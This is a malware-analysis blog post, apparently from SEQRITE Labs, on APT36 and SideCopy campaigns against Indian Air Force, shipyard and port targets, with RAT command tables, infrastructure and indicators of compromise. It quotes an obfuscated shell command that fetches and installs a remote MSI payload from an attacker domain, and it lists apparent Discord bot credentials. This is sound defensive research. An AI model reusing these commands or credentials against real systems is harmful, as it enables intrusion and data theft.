An open directory hosting malware linked to Transparent Tribe (APT36) has been found by SEQRITE Labs APT team. Further analysis revealed hidden URLs on the same domain containing payloads used by its sub-division APT group SideCopy. Targeting of Indian government entities such as Air Force, shipyards and ports by SideCopy is observed via multiple open directories that hosted its newer payloads. A strong correlation between these groups along with RusticWeb; including domain/IP, C2 name, decoy files, and more overlaps have been observed. In this blog, we will explore these payloads and the overlaps seen during the recent increase in such campaigns.
Key Findings
APT Overlaps
- A domain is found to be hosting payloads of both SideCopy and APT36 together, targeting Windows and Linux environments respectively.
- The C2 server used by SideCopy’s RAT payloads has the same Common Name (WIN-P9NRMH5G6M8) typically associated with that of APT36.
- Both threat groups along with RusticWeb, use the same lure file in various formats, infrastructure and web-services in their infection chains making their connections stronger.
SideCopy Infections
- Using updated HTA same as SideWinder to evade detections, making it fully undetectable (FUD). Encoded URLs that hosted RTF files of SideWinder APT group were found in SideCopy’s stager.
- Reverse RAT is delivered via MSI packages using an ‘Indian Air Force’ theme as a decoy, and in-memory variants of Reverse RAT were also seen. More open directories were found on another two domains hosting DOTM files to deliver Reverse RAT via BAT files, targeting shipyards & ports.
- New payloads used to steal documents and images called Cheex, a USB copier to steal files from attached drives, FileZilla application and SigThief scripts were also seen.
- Testing of stager evasion against anti-virus at Pakistan locations has been identified. At the same time, victim traffic from India that is typically observed from C2 located in Germany is being routed through IPsec protocol from Pakistan IPs, as shared by The Brofessor from Team Cymru.
- A new .NET-based payload named Geta RAT executed in-memory of HTA, incorporates browser stealing functionality from Async RAT. Parallelly, Action RAT is side-loaded by charmap.exe instead of the credwiz.exe/reykeywiz.exe and usage a honey trap theme named as ‘WhatsApp Image’ is seen.
Transparent Tribe Infections
- A Golang-based downloader targeting Linux systems is used to fetch the final payload from Google Drive. This final payload was recently seen to be fetched from a domain instead and has been named DISGOMOJI by Volexity, where “weak infrastructure links to SideCopy” were mentioned.
- The group continues to target the Linux platform with Poseidon using desktop shortcuts having lure themes such as ‘Posting/Transfer under Ph-III of Rotational Transfer’, ‘Blacklist IP Address with TLP & Dates’ and ‘LTC checklist’.
- The use of Crimson RAT, with ‘Uttarakhand Election Result’ and ‘TDS Claim Summary’ baits along with embedding of the FileZilla application, has also been observed.
Fig. 1 – Overlapping Infection Chain
Overlapping Attack
The domain found with the open directory is campusportals[.]in with multiple folders hosted on it. These contain Golang-based Linux payloads attributed to APT36, but at the same time, multiple hidden URLs were observed hosting HTA stagers that belong to SideCopy APT. The domain originally served as a guide to various Indian entrance exams, where the last post on their Twitter/YouTube was done in 2016. A similar open directory was observed earlier hosting SideCopy stagers on the same software LiteSpeed Web Server. The domain in this case, reviewassignment[.]in was used for another education portal, which is early childhood education and care services.
Fig. 2 – Open Directory hosting APT36 and hidden URLs with SideCopy stagers
A ZIP archive is present in one of the directories, this contains a password-protected PDF and a UPX-packed ELF binary. Unpacking this shows a Golang binary that acts as a downloader, where it first opens the decoy PDF using the passcode ‘745414’. The lure theme is a survey on internet usage which was observed in multiple previous campaigns of SideCopy since February 2023.
Fig. 3 – Internet survey lure
Then it downloads the next stage payload from Google Drive as gnucoreinfo to the hidden directory .x86_32-linux-gnu, makes it executable, and starts it in the background. Persistence is set up via two AutoStart desktop entries named – GNOME_Core.desktop and GNULib_Update.desktop. A bash script is dropped and registered for a cron job to download the payload and make sure that a duplicate process is not running as shown below.
Fig. 4 – Process of Golang downloader in persistence script
Variant of DISGOMOJI
The final payload is another UPX-packed Golang-based ELF binary named ‘vmcoreinfo.txt’. This is a remote access trojan based on an open-source repository discord-c2, that uses a Discord server as a C2 and emojis for communication. Volexity has observed different variants of DISGOMOJI, where server ID and bot token of Discord server are either hardcoded or downloaded at runtime as BID1.txt and GID1.txt from ordai[.]quest. In this version, Google Drive is used to download them with the following names that conveys it to be a second server:
Filename | Details and Google Drive Download Links |
BID2.txt | MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID) |
hxxps:// | |
GID2.txt | 1246900038160879688 (Bot Token) |
hxxps:// | |
GTK-Theme-Parse.txt | 2bf596603c432fa46b494dc3edd2d30f (MD5) |
hxxps:// |
All the error handling messages present try to mislead from the actual functionality, but one interesting error name is observed to be “Error updating Kavach Repository: %v“. An obfuscated file named GTK-Theme-Parse.txt is downloaded, which serves to periodically copy files from connected USB drives to a local directory. A cron job is set up similarly for persistence and these files could be exfiltrated using the emoji-based RAT.
Fig. 5 – Obfuscated USB stealer script
DISGOMOJI gathers basic system details initially and its functionality includes taking screenshots, execute commands, upload files to web services (oshi[.]at and transfer[.]sh), download and upload files via discord server, get Firefox browser profiles, and find files based on extension to exfiltrate. The last one has a unique string in Punjabi (most popular language in Pakistan) that translates to “I have given you all the knowledge, what else do you want?”, apt for data exfiltration. New Windows and Linux variants of PYSHELLFOX and GLOBESHELL for exfiltrating files and stealing Firefox profiles were also mentioned by BlackBerry.
Fig. 6 – Exfiltration message
Variant of Poseidon
We have also observed continuous deployment of Poseidon agents via Linux desktop shortcuts by Transparent Tribe, where the bait files were hosted similarly on Google Drive having fikumatry<at> and fitfalcon0900<at> as the owner of the account. The three different decoys observed are all related to various Indian government documents. These are osting/transfer of officers under Ministry of Defence from previous year, blacklisted IP addresses with TLP & dates, and a check list for LTC claims.
Fig. 7 – IP blacklist decoy with Poseidon (1)
Fig. 8 – Checklist decoy with Poseidon (2)
Fig. 9 – Posting/Transfer decoy with Poseidon (3)
Based on the URLs seen in a recent SideCopy infection, similar hosting of HTA stagers were identified along with same baits. The infection starts with an archived shortcut file, that starts the MSHTA process to execute remote HTA files hosted on this same domain. In total, six HTA files were found named as either 1.hta or 2.hta. The first HTA variant has two base64 decode functions, one based on JavaScript, and the other uses ActiveX objects. The functionality for this remains the same, which includes .NET version check, AV solution installed, concatenating payload and decoding strings, and finally executing DLL in-memory along with passing the decoy file.
Fig. 10 – HTA stager 2nd variant
The second HTA variant is heavily obfuscated and observed only at times since last year that uses multiple techniques:
- Decode a base64-like encoded string using a custom alphabet
- XOR based decryption (with keys: f551e832 and bWqQ)
- String reversal for every 1/2/5 characters
- Caesar cipher shift using multiple keys
Fig. 11 – Deobfuscation in HTA
The overall functionality remains the same, but these obfuscation patterns were seen in HTA of SideWinder APT since last year. Strings that are not used anywhere in the script contain URLs (cabinet-gov-pk[.]ministry-pk[.]net) that hosted RTF files of SideWinder a few years back.
Fig. 12 – SideCopy stager with SideWinder URLs (comments from analysis)
In-memory preBotHta DLL performs the usual sequence of opening decoy and getting AV solution installed. Based on the AV solution, it sets persistence as a combination of scheduled task (VBScript), run registry key or startup shortcut. Ultimately it either drops two additional HTA files or downloads MSFTEDIT.dll (Action RAT) from ‘hxxps://’ that is side loaded by charmap.exe which connects with 64.188.27[.]144 on port 5863 for C2.
Fig. 13 – SideWinder domain hosting RTF files
The HTA files dropped are named as useH, useT and alphaT, that have the same HTA functionality mentioned above and execute a DLL in-memory at the end. Two different DLLs are found, one is Reverse RAT that includes 19 commands for C2 along with USB file grabber, to save file and folders whenever a new drive is attached. The second one is a new .NET-based Geta RAT with 30 commands for C2, that can also steal both Firefox and Chromium-based browser data of all accounts, profiles and cookies. This browser plugin is borrowed from Async RAT as shown below.
Fig. 14 – Geta RAT vs. Async RAT
No | Command | Functionality |
1 | Disconnected | Close the connection |
2 | SystemInformation | Get system data (computer name, username, screen size, available & total memory (physical and virtual), OS details, battery power status, system up time, drivers, network details) |
3 | pkill | Kill specific process and fetch process list |
4 | ProcessManager | Get process list |
5 | Software | Get installed softwares |
6 | Passwords | Get Firefox and chromium-based browser credentials from all accounts/profiles/cookies |
7 | RD | Get screenshot of remote desktop |
8 | GetPcBounds | Get screen size |
9 | SetCurPos | Set cursor position |
10 | GetHostsFile | Get \etc\hosts file |
11 | SaveHostsFile | Save \etc\hosts file at specified location |
12 | GetCPText | Get clipboard contents |
13 | SaveCPText | Save clipboard contents at specified location |
14 | Shell | Run command via “cmd /C” |
15 | RecordingStart | No functionality defined but most likely used for screen capture |
16 | RecordingStop | No functionality defined but most likely used for screen capture |
17 | RecordingDownload | No functionality defined but most likely used for screen capture |
18 | ListDrives | Get drives list |
19 | ListFiles | Get files and directories for specified path |
20 | mkdir | Create a new directory |
21 | rmdir | Delete a directory |
22 | rnfolder | Rename a directory |
23 | mvdir | Move a directory |
24 | rmfile | Delete a file |
25 | rnfile | Rename a file |
26 | sharefile | Download a file |
27 | run | Execute a file |
28 | Execute | 1. Upload a file and execute it via DLL Side-loading 2. Execute “cmd /C netstat -ano” and get connection status of server IP 3. Get installed AV |
29 | addSys | Set persistence via registry or startup |
30 | fileupload | Upload a file |
Two similar iterations of HTA resembling CACTUS TORCH and SILENT TRINITY were observed but have evaded detections completely. These get executed via shortcut files and is utilizing themes such as honey trap and US China standoff to eventually drop the final payload.
Fig. 15 – New HTA stager
The differences noted in this new HTA though functionality remains the same:
- Apart from base64 decoding, another function with specified length to decode data is used. Primarily the embedded DLL is encoded twice using these functions.
- The decoy and side-loaded DLL are not embedded separately in the HTA but in the .NET DLL itself.
- Does not use WMI queries to get AV installed nor VBScript to get .NET version.
- Importantly, no target is specified to create instance and invoke dynamically.
Fig. 16 – Simplified HTA version
Instead of loading preBotHta or SummitOfBion in-memory, BroaderAspect.dll is seen where it drops the decoy and opens it. No check of anti-virus is done but registry run key is set for persistence and the DLL (DUser.dll) is dropped to sideload via rekeywiz. The target directory is ‘C:\Users\Public\BroadCastUSB\crezly.exe’ and the PDB path associated with two files is: ‘E:\TestAssembly\obj\Debug\BroaderAspect.pdb’.
Fig. 17 – DLL run in-memory of MSHTA
Reverse RAT campaigns
Multiple infections leading to Reverse RAT have been observed that used lures and fake domains related to various ship building docks, ports and even Air Force. All these entities are administered under Indian Government’s Ministry of Defence (MoD) and Ministry of Ports, Shipping and Waterways (MOPSW).
Fig. 18 – Reverse RAT infection and targets
A standalone variant of Reverse RAT is dropped via MSI package during the same timeline. ZIP file named ‘Salary_Increment_FY_2024’ contains an LNK shortcut to download and execute an MSI package as:
- C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
The package is comprised of a .NET Confuser PE file that gets executed during custom action & installation sequences as shown in the image below. Reverse RAT is dropped as “C:\\ProgramData\\VSUpdates\\svirbre.exe” at the end with the same 19 commands for C2 and persistence for it is set via another HTA script fileros.hta with the run registry key.
No | Command | Functionality |
1 | run | Execute a file |
2 | list | List files or directories of a path |
3 | pkill | Kill a running process |
4 | close | Close the connection with the C2 |
5 | rename | Rename a file |
6 | screen | Take a screenshot |
7 | upload | Upload a file to C2 |
8 | delete | Delete a file |
9 | reglist | List all registry keys and their values |
10 | process | List all running processes |
11 | programs | List all installed programs |
12 | download | Download a file from C2 |
13 | creatdir | Create a new directory |
14 | shellexec | Execute a command or open a file using cmd.exe |
15 | regnewkey | Create a new registry key |
16 | clipboard | Retrieve the clipboard content |
17 | regdelkey | Delete a registry key |
18 | downloadexe | Download and execute a file |
19 | clipboardset | Set the clipboard content |
Fig. 19 – MSI package to drop Reverse RAT
Infection chain with payloads is as follows:
Filename | Details | | Modify Date: 2024-06-03 |
Salary_Increment_FY_2024.pdf.lnk | Machine ID: cop125n, Modify Date: 2023-12-04 |
newpictures.png (MSI) | Modify Date: 2020-09-18, Author: MSTech Soft |
Filmeos.exe | .NET Confuser 1.x |
svirbre.exe (Reverse RAT) | Key: winupdates@7 C2: defender.windowupdatecache[.]in/officalupdates |
The decoy dropped contains salary increment details given to the employees of the Indian Air Force. It is a recent document mentioning the effective payout date as July 2024.
Fig. 20 – Indian Air Force pay decoy
More open directories
In July, two more domains with open directories were seen that hosted both new and old SideCopy payloads as seen with the timestamps. These contain multiple EXE, PNG, PDF, BAT, and other documents used in Reverse RAT campaigns. The domain slidesfinder[.]com hosted July samples that fetches payloads from another domain mazagondoc[.]com, which in turn hosted files in October 2023 for template injection attacks.
Fig. 21 – Open directories hosting SideCopy payloads
Two macro-enabled template documents named Aerospace.dotm and tmps.dotm were observed that begins the infection chain. Obfuscated subroutines get executed upon opening the document, where it downloads the hosted PNG file as a batch script “08973422348.bat” into the TEMP directory, if the HTTP response is 200. If the file exists, it runs the batch file using the Shell function.
Fig. 22 – VBA macro in template documents
In one of the templates, it later calls UNLK subroutine that changes the attached template of the active document to the Normal.dotm template in the user’s directory, and then closes the document without saving changes. If an error occurs, it calls the DVBP subroutine that attempts to remove all VBA components from the document, thereby deleting all VBA code. The batch script shown below essentially downloads the Reverse RAT payload as PNG using PowerShell, copies it to a hidden directory and creates a scheduled task to run every 5 minutes.
Fig. 23 – Batch script to download Reverse RAT
The decoy file Letter002.pdf is also downloaded and opened simultaneously, which corresponds to contract details of Cochin Shipyard Limited during January 2024, operating under Ministry of Ports, Shipping and Waterways. All these monthly contract details are available publicly on their legitimate domain. Apart from listening for the 19 commands, Reverse RAT downloads another file from mazagondoc[.]com domain, mimicking the official Ministry of Defence’s Mazagon Dock Shipbuilders Limited – mazagondock[.]in website. This domain hosting payloads was also observed in October 2023 campaign delivering Revere RAT with similar targeting. The C2 seen with Reverse RAT is vocport[.]com/Contactus, which is mimicking domain of V. O. Chidambaranar Port Authority under the Ministry of Ports, Shipping and Waterways.
Fig. 24 – Decoy with contract details of Cochin Shipyard
More and more of .NET
A new .NET-based payload is downloaded and run which has the functionality to search & save files with specific extension. These are later exfiltrated to the following servers as seen with two samples:
- hxxp://
- hxxps://googleservices[.]live/dakshf_upload.php
These samples also contain the PDB path of the source project under the username “Dead Snake” with name as cheex (an unrelated online platform with this name is present). It checks five folders – Desktop, Personal, Common Documents, Downloads and Recent for files with these 12 extensions – DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG and TXT.
C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb |
C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb |
Fig. 25 – New payloads for file exfiltration
As seen with Reverse RAT above delivered via MSI that included functionality for file exfiltration from attached USB devices, now that is present as a separate module altogether. All drive letters are enumerated, and files are copied to TEMP directory using background workers before uploading them to the same IP. PDB paths observed for two samples is:
e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb |
e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb |
Other files observed are macro-enabled documents, decoys, FileZilla application (used for file transfer) and an open-source python script SigThief used to steal and append signatures, were hosted related to previous campaigns.
- Naval_Projects_Payment_section_Report_29092023.docx
- Naval_Projects_Payment_section_Report_131023.docx
- Project_and_Services_Section_report_10102023.docx
- Letter002.pdf
- NavalProjects.pdf
Other decoy documents that are used in 2023 campaigns were also found on the same domain. These are related to port entry permit for government’s V. O. Chidambaranar Port Authority and invoice status of vendors related to Naval Projects. These lures are publicly available documents.
Fig. 26 – Naval port themed decoy from Oct 2023 campaign
Fig. 27 – Naval project invoice themed decoy from Oct 2023 campaign
Infrastructure and Attribution
Based on our analysis so far, we have observed overlaps between three Pakistan-linked APT groups. Transparent Tribe is known to utilize a diverse set of techniques, languages such as Golang, Python, etc. and Operation RusticWeb has utilized Rust-based payloads. Both these are using oshi[.]at web service, two same PDF bait documents and their fake domains resolved to the same IP address as observed by BlackBerry and Volexity.
Fig. 28 – Pakistani APT overlaps
Similarly, overlaps between SideCopy and APT36 have been observed such as lures, Linux-stager to drop Ares RAT and Poseidon respectively, payloads based on AllaKore RAT and the common name for C2. We attribute that RusticWeb is directly linked to APT36 with medium to high confidence, similar to SideCopy acting as a sub-team of APT36.
The fake/compromised domains used to host payloads resolve to the following IP addresses where two of them are seen with common name as WIN-BEJO0EMFO5K.
Domain | IP | ASN |
campusportals[.]in | 192.64.117[.]203 | AS22612 – Namecheap |
mazagondoc[.]com | 172.67.217[.]17 CN=WIN-BEJO0EMFO5K |
AS13335 – Cloudflare |
slidesfinder[.]com | 103.133.215[.]65 CN=WIN-BEJO0EMFO5K |
AS133643 – Ewebguru, India |
dipl[.]site | 151.106.117[.]91 | AS47583 – Hostinger |
utkalsevasamitikanjurmarg[.]in | 162.0.209[.]114 | AS22612 – NameCheap |
Looking at the C2 servers, the IP 64.188.27[.]144 was used with Action RAT and Geta RAT on same ports but even the Reverse RAT C2 checkdailytips.servehttp[.]com resolved to that IP. The common name associated with it WIN-P9NRMH5G6M8 is found in most C2 servers of APT36.
Fig. 29 – IP with Common Name of APT36
The domain vocport[.]com is used now as well as in past campaigns from October 2023. Whois details of all C2 servers with their payloads observed are as follows:
IP | ASN | Payload |
vocport[.]com 104.21.40[.]190 172.67.156[.]79 |
AS13335 – Cloudflare | Reverse RAT |
defender.windowupdatecache[.]in 172.67.128[.]127 |
AS13335 – Cloudflare | Reverse RAT |
checkdailytips.servehttp[.]com dns1.indianblog[.]xyz 64.188.27[.]144 |
AS8100 – QuadraNet
Reverse RAT, Action RAT, Geta RAT |
googleservices[.]live 149.28.95[.]195 |
AS13335 – Cloudflare AS20473 – Choopa |
Cheex, USB-Copier |
84.247.170[.]237 | AS51167 – Contabo | New RAT |
165.22.221[.]71 178.128.166[.]148 152.42.162[.]105 161.35.207[.]209 159.65.146[.]80 157.245.100[.]177 |
AS 14061 – DigitalOcean | Poseidon |
Based on this correlation and previous attack chains, these campaigns are attributed to both APT36 and SideCopy groups with high confidence, establishing yet another strong connection between them.
Multiple open directories hosting stagers/payloads linked to Pakistan APT groups has been discovered that targeted India Air Force, ports & shipyards under government entities. Various cyber operations have been observed where overlap between Transparent Tribe, SideCopy and RusticWeb is found.
APT36 focus is majorly Linux systems whereas SideCopy targets Windows systems adding new payloads to its arsenal. In the second quarter of 2024, multiple Pakistani-linked threat groups targeting India have been reported, that use android-based malware. These include Operation Celestial Force tracked as Cosmic Leopard and another new group leveraging WhatsApp to deliver SpyNote RAT. It is suggested to take necessary precautions and stay protected amidst the continuous cyber-attacks on India.
SEQRITE Protection
- Lnk.Sidecopy.48846.Gen_GC
- MSI.Sidecopy.48847.GC
- JS.Sidecopy.48848.Gen_GC
- Docx.APT36.48849.GC
- ELF.Agent.48863.GC
- ELF.Agent.48860.GC
- O97M.Dropper.DZ
- BAT.Downloader.48924
- XML.SideCopy.48922
- XML.SideCopy.48923
- TrojanAPT.ReverseRAT.S33893087
HTA | |
ced11422832a7380381323ae78a7a9bc f270105309e6574cab7a6acb1efb3c20 c574b2ebcc0aff84a23f1215f8a803be |
1.hta |
4938f42a3d691ef78f1ee8edc3b38f87 817532c454637a302238a4751694c336 e2f8fbc105a84283e191362f4ca07ae4 |
2.hta |
7c3b49f642f19116878b2c190f344f63 | alphaT.hta |
f6a58b0d267c7c53ccbcc6dafafd499b f55afc8192f30ff7a584dbda700383d1 |
useH.hta |
d6ae362b4b3f7a67949d177fdfc6bdec | useT.hta |
907ba4486c589f2cb4a45b92f2a5350e | Imge12542.hta |
336316c1b5ed77d31b4adc06e06a2f84 | ugt254d.hta |
LNK | |
f60c1a04161f354f0c6ac4678b3062d0 | Salary_Increment_FY_2024.pdf.lnk |
4dfdacf33db6ae0341b4d0e65aa3d755 | WhatsApp_Image_2024-05-06.lnk |
2041d2347f78ce03c1f9e990724adf3c | US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.lnk |
ZIP | |
fe8bf0bf2697d5e43e38d4b0364485a6 | |
b99717d81e142e58af91efb4d5288bda | |
109897ba1f92339f9dc9a74dc38dfc88 | |
Maldoc | |
807e6c1094b760e748a84ef9e05bc1f8 | Aerospace.dotm |
abb863131bbffad1dd8ee72d0758f34b | tmps.dotm |
eebb4913b54af93bcfc7d56e081502af | Project_and_Services_Section_report_10102023.docx |
e73b0354790273b0fcaa8c2deab3ad87 | Naval_Projects_Payment_section_Report_131023.docx |
44b23edd6c9a63a2a38f1bf3d4ff5bb9 | Naval_Projects_Payment_section_Report_29092023.docx |
354716db015373c089744e7319cd93d3 | Naval_Projects_Payment_section_Report_29092023.docx |
Others | |
6b45d5f194e2799e5178c8d858673900 | 08978.png (BAT) |
56fd3a2f701d30fe3e5ebdd0d471f1ed | newpictures.png (MSI) |
EXE | |
2478a5f6b82461eb06f3099478c4e2f6 | DUser.dll |
97113b266fbff61d8d2f92793672688d | Filmeos.exe |
96764912417d260653b6949afb0ad25c | Chromes.exe |
6a0adcf34a2f0ac21089b994dff02b85 | Filezilla.exe |
Reverse RAT | |
a7a71259bdf700807a763119fd652e73 | svirbre.exe / Fantos.exe |
c006701ec5025222a74a419f8c238689 | Postgrex.exe / rtloki.png |
d5719a9ef7a6f012e26d0c86b4a676d9 | igfxm.exe / rt12.png |
e6404136626a446b46bf4ecaa885560e | igfxtk.exe |
Cheex | |
825c7a1603f800ff247c8f3e9a1420af | AdobeArm.exe / dlhost.exe |
253957d7df5c7e70ec9001766e8f087b | cheex.exe |
USB Copier | |
3d2001c112290c019afcd51fede564d3 | AdobeReaders.exe / msedg.exe |
7ca8532b081f8612d1c0b6ea01d40299 | AdobeReaders.exe / msedgprefix.exe |
Decoys | |
5e88b5122ae380c4b4741dcf0bdca198 | Salary_Increment_FY_2024.pdf |
e415374f1f9533f10f706f0a9124b0d4 | WhatsApp Image 2024-05-06 at 12.23.08 AM.jpeg |
e79ca3852ae5e14766544ec1d5d4d268 | US China standoff – Opportunity for India Chadha 21 Aug 23.pdf |
cc0b292144ccdf4a95014809258982c4 | Letter002.pdf |
584ce9670a6f6a16eaaa615d64788f68 | NavalProjects.pdf |
b2e007c6bde2d2ce03a5257732df95b2 | 001doc.pdf |
d254f6d56ad874c5095b92d620cb5b80 | IT Trends.docx |
5fc559e4b663c20c9d5ea46fd164f4c7 | Survey.docx |
f997a21e9f7ad5eb9242b4decb7fdeb9 | India Emerging Global Economy.docx |
Domains (fake/compromised) | |
utkalsevasamitikanjurmarg[.]in | 162.0.209[.]114 |
dipl[.]site | 151.106.117[.]91 |
campusportals[.]in | 192.64.117[.]203 |
mazagondoc[.]com | |
slidesfinder[.]com | |
C2 and Ports | |
checkdailytips.servehttp[.]com/dailyworkout | |
defender[.]windowupdatecache[.]in/ 172.67.128[.]127:80 |
84.247.170[.]237:4858 | |
64.188.27[.]144:5863 | |
hxxp://vocport[.]com/Contactus | |
hxxp://vocport[.]com/khalistanLeaderprotest | |
hxxp://149.28.95[.]195/dakshf_upload.php | |
hxxps://googleservices[.]live/dakshf_upload.php | |
URLs | |
hxxps://campusportals[.]in/files/documents/bs/economy/ | |
hxxps://campusportals[.]in/files/documents/bs/economy/1.hta | |
hxxps://campusportals[.]in/files/documents/bs/economy/2.hta | |
hxxps://campusportals[.]in/files/documents/bs/it/ | |
hxxps://campusportals[.]in/files/documents/bs/it/1.hta | |
hxxps://campusportals[.]in/files/documents/bs/it/2.hta | |
hxxps://campusportals[.]in/files/documents/bs/survey/ | |
hxxps://campusportals[.]in/files/documents/bs/survey/1.hta | |
hxxps://campusportals[.]in/files/documents/bs/survey/2.hta | |
hxxps://campusportals[.]in/files/2.hta | |
hxxps://campusportals[.]in/files/documents/bs/2.hta | |
hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta | |
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/ | |
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png | |
hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/ | |
hxxps://dipl[.]site/Content/2022-23/01/03/ | |
hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta | |
hxxps://dipl[.]site/Content/2022-23/01/04/ | |
hxxps://dipl[.]site/Content/2022-23/01/01/ | |
hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta | |
hxxps://dipl[.]site/Content/2022-23/01/02/ | |
hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png | |
hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf | |
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png | |
hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png | |
hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm | |
hxxps://mazagondoc[.]com/documents01/001doc.pdf | |
hxxps://mazagondoc[.]com/documents01/08978.png | |
hxxps://mazagondoc[.]com/documents01/Filezilla.exe | |
hxxps://mazagondoc[.]com/documents01/Letter002.pdf | |
hxxps://mazagondoc[.]com/documents01/rt12.png | |
hxxps://mazagondoc[.]com/documents01/ | |
hxxps://mazagondoc[.]com/images/AdobeArm.exe | |
hxxps://mazagondoc[.]com/images/AdobeReader.bat | |
hxxps://mazagondoc[.]com/images/Chromes.exe | |
hxxps://mazagondoc[.]com/images/awccs.bat | |
hxxps://mazagondoc[.]com/images/igfxtk.bat | |
hxxps://mazagondoc[.]com/images/igfxtk.exe | |
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hxxps://mazagondoc[.]com/images/msedg.exe | |
hxxps://mazagondoc[.]com/images/msedgprefix.exe | |
hxxps://mazagondoc[.]com/images/ | |
hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx | |
hxxps://mazagondoc[.]com/images/pdf/cheexe.exe | |
hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm | |
hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx | |
hxxps://mazagondoc[.]com/images/templates/Slide7.png | |
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hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx | |
hxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx | |
Host | |
C:\Windows\Tasks\useH.hta | |
C:\Windows\Tasks\useT.hta | |
C:\Windows\Tasks\alphaT.hta | |
C:\Windows\Tasks\appH.bat | |
C:\Windows\Tasks\appT.bat | |
C:\Windows\Tasks\user01.bat | |
C:\Windows\Tasks\user02.bat | |
C:\ProgramData\VSUpdates\svirbre.exe | |
C:\Users\user\AppData\Roaming\AdobeArm.exe | |
C:\Users\user\AppData\Local\PrintsLogs\Postgres.exe | |
C:\Users\Public\BroadCastHUB\DUser.dll |
f264ed8c76b1102ea55d73d931ab879b | |
6065407484f1e22e814dfa00bd1fae06 | PCBL_05_25_JUNE_2024_IPs Consolidation.pdf.desktop |
bdde8c9948142fafeec00d7094ae964f | LTC_checklist.desktop |
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3a65fbc14bd7ff12cda97282935eefd8 | Internet usage Survey Form_protected.pdf (decoy) |
ELF | |
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4c52bb770d7b8639e1f305f908dbc800 | vmcoreinfo.txt (DISGOMOJI) |
Poseidon | |
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IPs | |
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Poseidon |
URLs | |
hxxps://campusportals[.]in/myfiles/bdocuments/ | |
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178.128.166[.]148/cjs-bin | |
159.65.146[.]80/bin-xdg | |
157.245.100[.]177/acpid-dit | |
hxxps://[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing | |
hxxps://[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing | |
hxxps://[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing | |
hxxps://[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
hxxps://[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
hxxps://[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ | |
fikumatry@gmail[.]com | |
fitfalcon0900@gmail[.]com |
Tactic | Technique ID | Name |
Resource Development | T1583.001 T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 |
Acquire Infrastructure: Domains Compromise Infrastructure: Domains Develop Capabilities: Malware Obtain Capabilities: Malware Obtain Capabilities: Tool Stage Capabilities: Upload Malware Stage Capabilities: Link Target |
Initial Access | T1566.001 T1566.002 |
Phishing: Spear phishing Attachment Phishing: Spear phishing Link |
Execution | T1106 T1129 T1059 T1047 T1204.001 T1204.002 |
Native API Shared Modules Command and Scripting Interpreter Windows Management Instrumentation User Execution: Malicious Link User Execution: Malicious File |
Persistence | T1053.003 T1547.001 T1547.013 |
Scheduled Task/Job: Cron Registry Run Keys / Startup Folder Boot or Logon Autostart Execution: XDG Autostart Entries |
Defense Evasion | T1027.010 T1036.005 T1036.007 T1140 T1218.005 T1574.002 T1027.009 T1027.010 |
Command Obfuscation Masquerading: Match Legitimate Name or Location Masquerading: Double File Extension Deobfuscate/Decode Files or Information System Binary Proxy Execution: Mshta Hijack Execution Flow: DLL Side-Loading Obfuscated Files or Information: Embedded Payloads Obfuscated Files or Information: Command Obfuscation |
Discovery | T1012 T1016 T1033 T1057 T1082 T1083 T1518.001 |
Query Registry System Network Configuration Discovery System Owner/User Discovery Process Discovery System Information Discovery File and Directory Discovery Software Discovery: Security Software Discovery |
Collection | T1005 T1056.001 T1074.001 T1119 T1113 T1125 |
Data from Local System Input Capture: Keylogging Data Staged: Local Data Staging Automated Collection Screen Capture Video Capture |
Command and Control | T1105 T1571 T1573 T1071.001 |
Ingress Tool Transfer Non-Standard Port Encrypted Channel Application Layer Protocol: Web Protocols |
Exfiltration | T1020 T1041 T1567 |
Automated Exfiltration Exfiltration Over C2 Channel Exfiltration Over Web Service |
Author: Sathwik Ram Prakki